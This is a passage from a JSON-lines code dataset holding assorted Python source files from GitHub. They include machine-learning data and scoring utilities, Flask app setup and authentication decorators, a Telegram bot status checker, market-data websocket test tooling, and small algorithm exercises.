(\n getattr(self.tgt, \"supports_prefetch\", False) or self.tgt is None\n )\n\n def prefetch(self, indices):\n self.src.prefetch(indices)\n if self.tgt is not None:\n self.tgt.prefetch(indices)\n if self.align_dataset is not None:\n self.align_dataset.prefetch(indices)\n\n def filter_indices_by_size(self, indices, max_sizes):\n \"\"\"Filter a list of sample indices. 
Remove those that are longer\n than specified in max_sizes.\n\n Args:\n indices (np.array): original array of sample indices\n max_sizes (int or list[int] or tuple[int]): max sample size,\n can be defined separately for src and tgt (then list or tuple)\n\n Returns:\n np.array: filtered sample array\n list: list of removed indices\n \"\"\"\n return data_utils.filter_paired_dataset_indices_by_size(\n self.src_sizes,\n self.tgt_sizes,\n indices,\n max_sizes,\n )\n\n\n ","repo_name":"FadedCosine/kNN-KD","sub_path":"fairseq/data/language_pair_with_knntargets_dataset.py","file_name":"language_pair_with_knntargets_dataset.py","file_ext":"py","file_size_in_byte":18993,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} +{"seq_id":"19819377900","text":"import unittest\n\nimport torch\nfrom aitemplate.compiler import compile_model, ops\nfrom aitemplate.compiler.base import Tensor\nfrom aitemplate.compiler.ops.common.epilogue import FuncEnum\nfrom aitemplate.compiler.transform.toposort import (\n _dfsSort,\n _priSort,\n SizePriTensorHelper,\n)\nfrom aitemplate.testing import detect_target\n\n\nclass TestTopoSort(unittest.TestCase):\n def _get_diff_size_graph(self):\n X1 = Tensor(shape=[10, 50], dtype=\"float16\", name=\"in_10_50\")\n X2 = Tensor(shape=[50, 1000], dtype=\"float16\", name=\"in_50_1000\")\n X3 = Tensor(shape=[1000, 5], dtype=\"float16\", name=\"in_1000_5\")\n X4 = Tensor(shape=[5, 5], dtype=\"float16\", name=\"in_5_5\")\n X5 = ops.gemm_rrr()(X1, X2)\n X5._attrs[\"name\"] = \"MUL_10_1000\"\n X6 = ops.gemm_rrr()(X3, X4)\n X6._attrs[\"name\"] = \"MUL_1000_5\"\n X7 = ops.gemm_rrr()(X5, X6)\n X7._attrs[\"name\"] = \"MUL_10_5\"\n X7._attrs[\"is_output\"] = True\n return X7\n\n def test_very_deep_toposort(self):\n x = Tensor(\n [2, 10],\n is_input=True,\n name=\"x\",\n )\n\n for _ in range(1000):\n x = ops.elementwise(FuncEnum.RELU)(x)\n\n x._attrs[\"is_output\"] = True\n x._attrs[\"name\"] = \"output\"\n\n target = detect_target()\n module = compile_model(x, target, \"./tmp\", \"test_very_deep_toposort\")\n\n x_pt = torch.randn((2, 10)).half().cuda()\n out_pt = torch.relu(x_pt)\n\n out_ait = torch.empty_like(out_pt)\n module.run_with_tensors({\"x\": x_pt}, {\"output\": out_ait})\n\n self.assertTrue(torch.equal(out_ait, out_pt))\n\n def test_size_pri_toposort(self):\n tensor = self._get_diff_size_graph()\n expected_order = [\n \"in_10_50\",\n \"in_50_1000\",\n \"in_1000_5\",\n \"in_5_5\",\n \"MUL_10_1000\",\n \"MUL_1000_5\",\n \"MUL_10_5\",\n ]\n self.assertEqual(\n [node._attrs[\"name\"] for node in _priSort(tensor, SizePriTensorHelper())],\n expected_order,\n )\n\n # dfs don't follow size pri order\n self.assertNotEqual(\n [node._attrs[\"name\"] for node in _dfsSort(tensor)], expected_order\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"facebookincubator/AITemplate","sub_path":"tests/unittest/compiler/test_transform_toposort.py","file_name":"test_transform_toposort.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"7417305168","text":"import os\n\nfrom flask import Flask\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n app.config.from_mapping(\n SECRET_KEY='dev',\n DATABASE_URI=os.path.join(app.instance_path, 'releves.sqlite'),\n DT_FMT=\"%Y-%m-%d %H:%M:%S\",\n CSRF_ENABLED=True\n )\n\n if test_config is None:\n # load the instance 
config, if it exists, when not testing\n app.config.from_pyfile('config.py', silent=True)\n else:\n # load the test config if passed in\n app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n from . import db\n db.init_app(app)\n\n from . import api\n app.register_blueprint(api.bp)\n\n from . import web\n app.register_blueprint(web.bp)\n app.add_url_rule('/', endpoint='index')\n\n return app\n","repo_name":"patrabu/releves","sub_path":"releves/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21103298760","text":"import abc\nfrom typing import Any, Type, TypeVar\n\nimport torch\nimport torch.nn as nn\n\nfrom rl_recsys.user_modeling.features_gen import AbstractFeaturesGenerator\n\nfeature_gen_type = TypeVar(\"feature_gen_type\", bound=AbstractFeaturesGenerator)\n\n\nclass AbstractUserState(nn.Module, metaclass=abc.ABCMeta):\n # hidden state of the user\n def __init__(self, **kwargs: Any) -> None:\n super().__init__(**kwargs)\n user_state = self._generate_state(**kwargs)\n self.register_buffer(\"user_state\", user_state)\n # used to reset the intent to the initial create one at the end of an episode\n self.register_buffer(\"user_state_init\", user_state)\n\n @abc.abstractmethod\n def _generate_state(self, **kwargs: Any) -> torch.Tensor:\n \"\"\"Generate the user hidden state\"\"\"\n pass\n\n @abc.abstractmethod\n def update_state(self, selected_doc_feature: torch.Tensor, **kwargs) -> None:\n \"\"\"Update the user hidden state\"\"\"\n pass\n\n\nclass ObservableUserState(AbstractUserState):\n def __init__(\n self,\n user_features: torch.Tensor,\n interest_update_rate: float = 0.3, # y in the paper\n **kwargs: Any,\n ) -> None:\n self.user_features = user_features\n self.interest_update_rate = interest_update_rate\n super().__init__(**kwargs)\n\n def _generate_state(self) -> torch.Tensor:\n return self.user_features\n\n def reset_state(self) -> None:\n self.user_state = self.user_state_init\n\n def update_state(self, selected_doc_feature: torch.Tensor) -> None:\n index = torch.argmax(selected_doc_feature)\n delta_t = (\n -self.interest_update_rate * torch.abs(self.user_state[index]) # type: ignore\n + self.interest_update_rate\n ) * -self.user_state[\n index\n ] # type: ignore\n\n I = torch.dot(self.user_state, selected_doc_feature) # type: ignore\n p_positive = (I + 1) / 2\n p_negative = (1 - I) / 2\n\n random = torch.rand(1)\n if random < p_positive:\n self.user_state[index] += delta_t # type: ignore\n # if random < p_negative:\n # self.user_state[index] -= delta_t # type: ignore\n else:\n self.user_state[index] -= delta_t # type: ignore\n\n self.user_state = torch.clamp(self.user_state, -1, 1)\n","repo_name":"Asr419/rl_wolpertinger","sub_path":"src/rl_recsys/user_modeling/user_state.py","file_name":"user_state.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37472898371","text":"import os\n\nimport cursor\nimport openai\nfrom prompt_toolkit import PromptSession\nfrom prompt_toolkit.auto_suggest import AutoSuggestFromHistory\nfrom rich.console import Console\nfrom rich.text import Text\n\nfrom .database import insert_message, load_conversation_history, create_conversation\n\n\ndef prompt_continuation(width, line_number, is_soft_wrap):\n return '> '\n\n\ndef 
start_chat(conn, conversation_name, init_prompt):\n    openai.api_key = os.environ["OPENAI_API_KEY"]\n    conversation_id = create_conversation(conn, conversation_name)\n    messages = load_conversation_history(conn, conversation_id)\n\n    cursor.show()\n    console = Console()\n    console.print(Text.from_markup("\n" * console.height), end="", soft_wrap=True)\n    print("ESC+Enter to send")\n\n    prompt_session = PromptSession()\n    while True:\n        text_from_user = prompt_session.prompt('\n> ',\n                                               multiline=True,\n                                               prompt_continuation=prompt_continuation,\n                                               auto_suggest=AutoSuggestFromHistory()\n                                               )\n        print()\n\n        messages.append({\n            "role": "user",\n            "content": text_from_user\n        })\n        insert_message(conn, conversation_id, "user", text_from_user)\n\n        response = openai.ChatCompletion.create(\n            model="gpt-3.5-turbo",\n            messages=messages,\n            temperature=0.7,\n            stream=True\n        )\n\n        role = None\n        delta_contents = []\n\n        for chunk in response:\n            role = role or chunk.choices[0].delta.get("role")\n            delta_content = chunk.choices[0].delta.get("content")\n            if delta_content:\n                console.print(delta_content, end="", soft_wrap=True)\n                delta_contents.append(delta_content)\n                console.file.flush()\n        print()\n\n        reply = "".join(delta_contents)\n        messages.append({\n            "role": role,\n            "content": reply\n        })\n        insert_message(conn, conversation_id, role, reply)\n","repo_name":"tartakynov/assistant","sub_path":"assistant/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18079090467","text":"# -*- coding: utf-8 -*-\n# http://google-styleguide.googlecode.com/svn/trunk/pyguide.html\n\nimport re\nfrom copy import deepcopy\nimport jsonschema\nfrom functools import update_wrapper\nfrom flask import request, abort\nfrom sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound\nfrom smsgw.core import db\nfrom smsgw.models import User, UserToken, Template, Contact, Tag, Application, \\\n                         Outbox, SentItem, Inbox, Phone\n\n\ndef jsonschema_validate(schema=None, **options):\n    """\n    Apply json validation on the request payload or function arguments\n    :param schema: {dict} JSON schema the request payload is validated against\n    :param options: {dict} of function parameters\n    """\n    def decorator(fn):\n        def wrapped_function(*args, **kwargs):\n            # validate request payload\n            if schema:\n                jsonschema.validate(request.json, schema=schema)\n\n            return fn(*args, **kwargs)\n        return update_wrapper(wrapped_function, fn)\n    return decorator\n\n\ndef auth(role=User.ROLE_USER):\n    """\n    Authentication decorator\n    :param role: {str} user role\n    """\n\n    def decorator(fn):\n\n        routing = {\n            'user': User,\n            'template': Template,\n            'contact': Contact,\n            'tag': Tag,\n            'application': Application,\n            'outbox': Outbox,\n            'sentitem': SentItem,\n            'inbox': Inbox,\n            'phone': Phone\n        }\n\n        def unauthorized():\n            abort(401)\n\n        def forbidden():\n            abort(403)\n\n        def not_found():\n            abort(404)\n\n        def wrapped_function(*args, **kwargs):\n            # get authorization content\n            authorization = request.headers.get('Authorization')\n            if authorization is None:\n                unauthorized()\n\n            # get token by regex from authorization header\n            token = None\n            token_search = re.search('Token\ ([a-zA-Z0-9\-]{36})', authorization)\n            if token_search:\n                token = token_search.group(1)\n            if token is None:\n                unauthorized()\n\n            try:\n                # find user by token\n                user = UserToken.query \\\n                    .filter_by(token=token) \\\n                    .one() \\\n                    .user\n            except (NoResultFound, MultipleResultsFound):\n                unauthorized()\n\n            # 
user inactive\n            if not user.isActive:\n                unauthorized()\n\n            # checking role\n            if not user.is_admin() and user.role != role:\n                forbidden()\n\n            # saving user instance to request\n            request.user = user\n\n            # TODO(vojta): refactor; resolves URL kwargs like 'user_uuid' into model instances\n            updates = {}\n            for key, value in kwargs.iteritems():\n                if hasattr(value, 'replace'):\n                    value = value.replace('@me', user.uuid)\n                name = key.split('_')\n                if len(name) > 1:\n                    route, field = name\n                    if route == 'user' and value == user.uuid:\n                        updates['user'] = user\n                    elif route in routing:\n                        try:\n                            filter_by = {}\n                            filter_by[field] = value\n                            updates[route] = routing[route].query \\\n                                .filter_by(**filter_by) \\\n                                .one()\n                        except (NoResultFound, MultipleResultsFound):\n                            not_found()\n            kwargs.update(updates)\n\n            # if the requested user is not the logged-in user, the caller\n            # needs the admin role or a 403 is returned\n            requested_user = kwargs.get('user')\n            if requested_user is not None:\n                if request.user.uuid != requested_user.uuid:\n                    if request.user.role != User.ROLE_ADMIN:\n                        forbidden()\n\n            return fn(*args, **kwargs)\n        return update_wrapper(wrapped_function, fn)\n    return decorator\n\n\ndef auth_external():\n    """\n    Authenticate an external application by its Authorization token\n    """\n    def decorator(fn):\n        def wrapped_function(*args, **kwargs):\n            # get authorization content\n            token = request.headers.get('Authorization')\n            if token is None:\n                abort(401)\n\n            # find application by authorization token\n            application = Application.get_one(token=token)\n            if application is None:\n                abort(401)\n\n            # pass application to endpoint handler\n            kwargs['application'] = application\n\n            return fn(*args, **kwargs)\n        return update_wrapper(wrapped_function, fn)\n    return decorator\n","repo_name":"VojtechBartos/smsgw","sub_path":"smsgw/resources/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"72878975208","text":"# link : https://leetcode.com/problems/two-sum-ii-input-array-is-sorted/description/\n# author : Mohamed Ibrahim\n\n\nclass Solution:\n    def twoSum(self, numbers: List[int], target: int) -> List[int]:\n        i,j = 0,len(numbers)-1\n        while i < j:\n            if numbers[i]+numbers[j] == target : return [i+1,j+1]\n            if numbers[i]+numbers[j] > target:j-=1\n            else:i+=1\n        \n\n    \n# Using Recursion\n\nclass Solution:\n    def twoSum(self, numbers: List[int], target: int) -> List[int]:\n        return self.resc(numbers,0,len(numbers)-1,target)\n    def resc(self,numbers,i,j,t):\n        sum = numbers[i]+numbers[j]\n        if sum == t: return [i+1,j+1]\n        elif sum > t:\n            return self.resc(numbers,i,j-1,t)\n        else:\n            return self.resc(numbers,i+1,j,t) \n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"LeetCode/Two Sum II.py","file_name":"Two Sum II.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"25182751013","text":"import os\r\nimport re\r\nimport pytz\r\nimport asyncio\r\nimport datetime\r\n\r\nfrom pyrogram import Client, filters\r\nfrom pyrogram.errors import FloodWait\r\n\r\n\r\napp = Client(\r\n    name = "devbotz",\r\n    api_id = int(os.environ["API_ID"]),\r\n    api_hash = os.environ["API_HASH"],\r\n    session_string = os.environ["SESSION_STRING"]\r\n)\r\n\r\nTIME_ZONE = os.environ["TIME_ZONE"]\r\nBOT_LIST = [i.strip() for i in os.environ.get("BOT_LIST").split(' ')]\r\nCHANNEL_ID = int(os.environ["CHANNEL_ID"]) #CHANNEL_ID is for group/channel where checker will update the status.\r\nMESSAGE_ID = 
int(os.environ["MESSAGE_ID"])\r\nBOT_ADMIN_IDS = [int(i.strip()) for i in os.environ.get("BOT_ADMIN_IDS").split(' ')]\r\nGRP_ID = os.environ.get("GRP_ID") #GRP_ID is for logs group where checker will send warnings of offline bots.\r\n\r\nasync def main_devchecker():\r\n    async with app:\r\n        while True:\r\n            print("Checking...")\r\n            xxx_teletips = f"**🏷 ᴡᴇʟᴄᴏᴍᴇ ᴛᴏ {(await app.get_chat(CHANNEL_ID)).title} ɪɴғᴏʀᴍᴀᴛɪᴏɴ ᴄʜᴀɴɴᴇʟ**\n\n 📈 | **ʀᴇᴀʟ ᴛɪᴍᴇ ʙᴏᴛ's sᴛᴀᴛᴜs 🍂**"\r\n            for bot in BOT_LIST:\r\n                await asyncio.sleep(7)\r\n                try:\r\n                    bot_info = await app.get_users(bot)\r\n                except Exception:\r\n                    bot_info = bot\r\n\r\n                try:\r\n                    yyy_teletips = await app.send_message(bot, "/start")\r\n                    aaa = yyy_teletips.id\r\n                    await asyncio.sleep(15)\r\n                    zzz_teletips = app.get_chat_history(bot, limit = 1)\r\n                    async for ccc in zzz_teletips:\r\n                        bbb = ccc.id\r\n                    if aaa == bbb:\r\n                        xxx_teletips += f"\n\n╭⎋ **[{bot_info.first_name}](tg://user?id={bot_info.id})**\n╰⊚ **sᴛᴀᴛᴜs: ᴏғғʟɪɴᴇ ❄**"\r\n                        for bot_admin_id in BOT_ADMIN_IDS:\r\n                            try:\r\n                                await app.send_message(int(GRP_ID), f"**ʙsᴅᴋ ᴋʏᴀ ᴋᴀʀ ʀᴀʜᴀ ʜᴀɪ 😡\n[{bot_info.first_name}](tg://user?id={bot_info.id}) ᴏғғ ʜᴀɪ. ᴀᴄᴄʜᴀ ʜᴜᴀ ᴅᴇᴋʜ ʟɪʏᴀ ᴍᴀɪɴᴇ.**")\r\n                            except Exception:...\r\n                        await app.read_chat_history(bot)\r\n                    else:\r\n                        xxx_teletips += f"\n\n╭⎋ **[{bot_info.first_name}](tg://user?id={bot_info.id})**\n╰⊚ **sᴛᴀᴛᴜs: ᴏɴʟɪɴᴇ ✨**"\r\n                        await app.read_chat_history(bot)\r\n                except FloodWait as e:\r\n                    # pull the flood-wait duration (in seconds) out of the error text before sleeping\r\n                    ttm = re.search(r"\d+", str(e)).group(0)\r\n                    await asyncio.sleep(int(ttm))\r\n            time = datetime.datetime.now(pytz.timezone(f"{TIME_ZONE}"))\r\n            last_update = time.strftime(f"%d %b %Y at %I:%M %p")\r\n            xxx_teletips += f"\n\n✔️ ʟᴀsᴛ ᴄʜᴇᴄᴋᴇᴅ ᴏɴ:\n**ᴅᴀᴛᴇ & ᴛɪᴍᴇ: {last_update}**\n**ᴛɪᴍᴇ ᴢᴏɴᴇ: ({TIME_ZONE})**\n\n♻️ ʀᴇғʀᴇsʜᴇs ᴀᴜᴛᴏᴍᴀᴛɪᴄᴀʟʟʏ ᴡɪᴛʜɪɴ 10 ᴍɪɴᴜᴛᴇs.\n\n**๏ ᴘᴏᴡᴇʀᴇᴅ ʙʏ @{(await app.get_chat(CHANNEL_ID)).username} ๏**"\r\n            await app.edit_message_text(int(CHANNEL_ID), MESSAGE_ID, xxx_teletips)\r\n            print(f"Last checked on: {last_update}") \r\n            await asyncio.sleep(600)\r\n    \r\napp.run(main_devchecker())\r\n\r\n","repo_name":"Devarora-0981/Status-Checker","sub_path":"dev_status_checker.py","file_name":"dev_status_checker.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"18323719113","text":"# -*- coding: utf-8 -*-\n# !/usr/bin/python\n# @Author: WX\n# @Create Time: 2020/5/16\n# @Software: PyCharm\n\n\nfrom websocket_py3.ws_api.subscribe_server_api import *\nfrom common.common_method import *\n\n\nclass SimpleAppFunc(object):\n    def __init__(self, ws_url):\n        self.url = ws_url\n        self.common = Common()\n        self.loop = self.common.getNewLoop()\n        self.api = SubscribeApi(self.url, self.loop)\n\n    def connect(self):\n        try:\n            self.loop.run_until_complete(self.api.client.ws_connect())\n        except Exception as e:\n            self.common.logger.debug('app connect error:\n{}'.format(e))\n\n    def disconnect(self):\n        try:\n            self.api.client.disconnect()\n        except Exception as e:\n            self.common.logger.debug('app disconnect error:\n{}'.format(e))\n\n    def login(self):\n        try:\n            self.loop.run_until_complete(self.api.LoginReq('app_login', int(time.time() * 1000)))\n            asyncio.run_coroutine_threadsafe(self.api.hearbeat_job(), self.loop)\n        except Exception as e:\n            self.common.logger.debug('app login error:\n{}'.format(e))\n\n    def loginout(self):\n        try:\n            self.loop.run_until_complete(self.api.LogoutReq(int(time.time() * 1000)))\n        except Exception as e:\n            self.common.logger.debug('app loginout error:\n{}'.format(e))\n\n    def sub_market(self):\n        try:\n            sub_type = 
SubscribeMsgType.SUB_WITH_MARKET\n            base_info = [{'exchange': 'HKFE'}]\n            start_time_stamp = int(time.time() * 1000)  # timestamp in milliseconds\n            quote_rsp = self.loop.run_until_complete(\n                future=self.api.SubsQutoMsgReqApi(sub_type=sub_type, child_type=None, base_info=base_info,\n                                                  start_time_stamp=start_time_stamp))\n            first_rsp_list = quote_rsp['first_rsp_list']\n            assert (self.common.searchDicKV(first_rsp_list[0], 'retCode') == 'SUCCESS')\n\n        except Exception as e:\n            self.common.logger.debug('app sub_market error:\n{}'.format(e))\n\n    def unsub_market(self):\n        try:\n            sub_type = SubscribeMsgType.SUB_WITH_MARKET\n            base_info = [{'exchange': 'HKFE'}]\n            start_time_stamp = int(time.time() * 1000)  # timestamp in milliseconds\n            quote_rsp = self.loop.run_until_complete(\n                future=self.api.UnSubsQutoMsgReqApi(unsub_type=sub_type, unchild_type=None, unbase_info=base_info,\n                                                    start_time_stamp=start_time_stamp, recv_num=10000))\n        except Exception as e:\n            self.common.logger.debug('app unsub_market error:\n{}'.format(e))\n\n    def recv_forever(self):\n        while True:\n            self.loop.run_until_complete(self.api.AppQuoteAllApi(recv_num=100))\n\n    def sub_product(self):\n        try:\n            sub_type = SubscribeMsgType.SUB_WITH_PRODUCT\n            self.product_code = 'HHI'\n            base_info = [{'exchange': 'HKFE', 'product_code': self.product_code}]\n            start_time_stamp = int(time.time() * 1000)  # timestamp in milliseconds\n            quote_rsp = self.loop.run_until_complete(\n                future=self.api.SubsQutoMsgReqApi(sub_type=sub_type, child_type=None, base_info=base_info,\n                                                  start_time_stamp=start_time_stamp))\n        except Exception as e:\n            self.common.logger.debug('app sub_product error:\n{}'.format(e))\n\n    def unsub_product(self):\n        try:\n            sub_type = SubscribeMsgType.SUB_WITH_PRODUCT\n            # self.product_code = 'HHI'\n            base_info = [{'exchange': 'HKFE', 'product_code': self.product_code}]\n            start_time_stamp = int(time.time() * 1000)  # timestamp in milliseconds\n            quote_rsp = self.loop.run_until_complete(\n                future=self.api.UnSubsQutoMsgReqApi(unsub_type=sub_type, unchild_type=None, unbase_info=base_info,\n                                                    start_time_stamp=start_time_stamp, recv_num=10000))\n        except Exception as e:\n            self.common.logger.debug('app unsub_product error:\n{}'.format(e))\n\n    def sub_instr(self):\n        try:\n            sub_type = SubscribeMsgType.SUB_WITH_INSTR\n            self.code = 'HHI2005'\n            base_info = [{'exchange': 'HKFE', 'code': self.code}]\n            start_time_stamp = int(time.time() * 1000)  # timestamp in milliseconds\n            quote_rsp = self.loop.run_until_complete(\n                future=self.api.SubsQutoMsgReqApi(sub_type=sub_type, child_type=None, base_info=base_info,\n                                                  start_time_stamp=start_time_stamp))\n        except Exception as e:\n            self.common.logger.debug('app sub_instr error:\n{}'.format(e))\n\n    def unsub_instr(self):\n        try:\n            sub_type = SubscribeMsgType.SUB_WITH_INSTR\n            base_info = [{'exchange': 'HKFE', 'code': self.code}]\n            start_time_stamp = int(time.time() * 1000)  # timestamp in milliseconds\n            quote_rsp = self.loop.run_until_complete(\n                future=self.api.UnSubsQutoMsgReqApi(unsub_type=sub_type, unchild_type=None, unbase_info=base_info,\n                                                    start_time_stamp=start_time_stamp, recv_num=10000))\n        except Exception as e:\n            self.common.logger.debug('app unsub_instr error:\n{}'.format(e))\n\n    def listen_and_action(self):\n        introduce_info = '''\n            action == 1 : ws connect\n            action == 2 : ws disconnect\n            action == 3 : login\n            action == 4 : loginout\n            action == 5 : sub_market\n            action == 6 : unsub_market\n            action == 7 : sub_product\n            action == 8 : unsub_product\n            action == 9 : sub_instr\n            action == 0 : unsub_instr\n            action == a : recv_forever\n            action == q : exit\n        '''\n        self.common.logger.debug('Please input as shown 
below.{}'.format(introduce_info))\n        board = KeyboardListen()\n        board.start_listen()\n        input_num = 0\n        while True:\n            if board.input_num > input_num:\n                try:\n                    input_num = board.input_num\n                    # the digit may come from the numeric keypad, so each action maps to two key values\n                    if board.key in ['1', '97']:\n                        self.common.logger.debug('action == 1 : ws connect')\n                        self.connect()\n                    elif board.key in ['2', '98']:\n                        self.common.logger.debug('action == 2 : ws disconnect')\n                        self.disconnect()\n                    elif board.key in ['3', '99']:\n                        self.common.logger.debug('action == 3 : login')\n                        self.login()\n                    elif board.key in ['4', '100']:\n                        self.common.logger.debug('action == 4 : loginout')\n                        self.loginout()\n                    elif board.key in ['5', '101', '65437']:  # linux's little keyboard is 65437\n                        self.common.logger.debug('action == 5 : sub_market')\n                        self.sub_market()\n                    elif board.key in ['6', '102']:\n                        self.common.logger.debug('action == 6 : unsub_market')\n                        self.unsub_market()\n                    elif board.key in ['7', '103']:\n                        self.common.logger.debug('action == 7 : sub_product')\n                        self.sub_product()\n                    elif board.key in ['8', '104']:\n                        self.common.logger.debug('action == 8 : unsub_product')\n                        self.unsub_product()\n                    elif board.key in ['9', '105']:\n                        self.common.logger.debug('action == 9 : sub_instr')\n                        self.sub_instr()\n                    elif board.key in ['0', '96']:\n                        self.common.logger.debug('action == 0 : unsub_instr')\n                        self.unsub_instr()\n                    elif board.key == 'a':\n                        self.common.logger.debug('action == a : recv_forever')\n                        self.recv_forever()\n                    elif board.key == 'q':\n                        self.common.logger.debug('action == q : exit')\n                        break\n                    else:\n                        self.common.logger.debug('Input unknown! Please input as shown below. \n{}'.format(introduce_info))\n                except Exception as e:\n                    self.common.logger.debug('app listen error:\n{}'.format(e))\n\n\nif __name__ == '__main__':\n    pass","repo_name":"rage-vampire/Python","sub_path":"Code/marketTest/testcase/ws_testcase/tool/simple_app.py","file_name":"simple_app.py","file_ext":"py","file_size_in_byte":8610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32239616355","text":"# -*- coding: utf-8 -*-\r\n"""\r\nCreated on Fri Oct  7 23:24:50 2022\r\n\r\n@author: mmd20\r\n"""\r\n\r\n\r\n\r\n#%%\r\n\r\ndef rotated_array_search(input_list, number):\r\n    """\r\n    Find the index by searching in a rotated sorted array\r\n\r\n    Args:\r\n       input_list(array), number(int): Input array to search and the target\r\n    Returns:\r\n       int: Index or -1\r\n    """\r\n    def binary_search_recursive(array, target, start_index, end_index):\r\n        if start_index > end_index:\r\n            return -1\r\n        \r\n        mid_index = (start_index + end_index) // 2\r\n        mid_element = array[mid_index]\r\n        \r\n        if mid_element == target:\r\n            return mid_index\r\n        \r\n        index_left_side = binary_search_recursive(array, target, start_index, mid_index - 1)\r\n        index_right_side = binary_search_recursive(array, target, mid_index + 1, end_index)\r\n        \r\n        return max(index_left_side, index_right_side)\r\n\r\n    start_index = 0\r\n    end_index = len(input_list)-1 \r\n\r\n    return binary_search_recursive(input_list, number, start_index, end_index)\r\n\r\n\r\ndef linear_search(input_list, number):\r\n    for index, element in enumerate(input_list):\r\n        if element == number:\r\n            return index\r\n    return -1\r\n\r\ndef test_function(test_case):\r\n    input_list = test_case[0]\r\n    number = test_case[1]\r\n    if linear_search(input_list, number) == rotated_array_search(input_list, number):\r\n        print("Pass")\r\n    else:\r\n        print("Fail")\r\n\r\ntest_function([[6, 7, 8, 9, 10, 1, 2, 3, 4], 6])\r\ntest_function([[6, 7, 8, 9, 10, 1, 
2, 3, 4], 1])\r\ntest_function([[6, 7, 8, 1, 2, 3, 4], 8])\r\ntest_function([[6, 7, 8, 1, 2, 3, 4], 1])\r\ntest_function([[6, 7, 8, 1, 2, 3, 4], 10])\r\n\r\n\r\n","repo_name":"medetm0524/22Udacity_Nanodegree_DSA","sub_path":"3_Basic_Algorithms/Problem2_corrected.py","file_name":"Problem2_corrected.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5499101076","text":"import glob\nimport json\nimport os\nimport logging\nimport hydra\nimport torch\nimport tqdm\nfrom transformers import set_seed\nfrom accelerate import Accelerator\nfrom inferencer import Inferencer\nfrom src.utils.misc import save_json\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Scorer(Inferencer):\n\n def forward(self):\n if self.accelerator.is_main_process:\n dataloader = tqdm.tqdm(self.dataloader)\n else:\n dataloader = self.dataloader\n\n res = []\n for i, entry in enumerate(dataloader):\n metadata = entry.pop(\"metadata\")\n # fix position id error when using left padding, note that calling generate() doesn't affected by this,\n # but here we don't generate new tokens, so we have to fix it manually.\n position_ids = entry.attention_mask.long().cumsum(-1) - 1\n # replace -1 with 1, final position id is like [1, 1, ..., 1, 0, 1, 2, 3...],\n # where prior 1s is ignored in self-attention\n position_ids.masked_fill_(entry.attention_mask == 0, 1)\n\n with torch.no_grad():\n output = self.model(input_ids=entry.input_ids, attention_mask=entry.attention_mask,\n position_ids=position_ids)\n\n loss = self.nll_loss(entry=entry, output=output)\n\n for mdata, loss in zip(metadata, loss):\n mdata['score'] = loss\n\n if i == 0:\n logger.info(f\"Prompt: {metadata[0]['prompt']}\")\n logger.info(f\"Number of ICE: {len(metadata[0]['ice_prompts_list'])}\")\n\n res.extend(metadata)\n\n with open(f\"{self.output_file}tmp_{self.accelerator.device}.bin\", \"w\") as f:\n json.dump(res, f)\n\n def nll_loss(self, entry, output):\n shift_logits = output.logits[..., :-1, :].contiguous()\n shift_labels = entry.input_ids[..., 1:].contiguous()\n pad_token_id = self.dataset_reader.tokenizer.pad_token_id\n # entry.labels is already padded with pad_token_id, we further pad it to full length\n pad_mask = torch.nn.functional.pad(entry.labels,\n (shift_labels.shape[-1] - entry.labels.shape[-1], 0),\n value=pad_token_id)\n shift_labels.masked_fill_(pad_mask == pad_token_id, pad_token_id)\n\n loss_fct = torch.nn.CrossEntropyLoss(reduction='none', ignore_index=pad_token_id)\n loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)),\n shift_labels.view(-1)).view(shift_labels.size())\n answer_lens = (entry.labels != pad_token_id).sum(-1)\n loss = loss.sum(-1) / answer_lens\n loss = loss.cpu().detach().numpy().tolist()\n return loss\n\n def write_results(self):\n data = []\n for i, path in enumerate(glob.glob(f\"{self.output_file}tmp_*.bin\")):\n with open(path) as f:\n one_device = json.load(f)\n logger.info(f\"device: {i}, idx {[i['idx'] for i in one_device][:200]}...\")\n data.extend(one_device)\n\n # grouping results by uid\n example_dict = {}\n uid_field = 'idx'\n for entry in data:\n ctxs = {\"ctxs\": entry.pop('ctxs'), \"score\": entry.pop(\"score\")}\n if entry[uid_field] not in example_dict:\n entry['ctxs_candidates'] = [ctxs]\n example_dict[entry[uid_field]] = entry\n else:\n example_dict[entry[uid_field]]['ctxs_candidates'].append(ctxs)\n\n example_list = list(example_dict.values())\n mrr = 0\n num_candidates = 
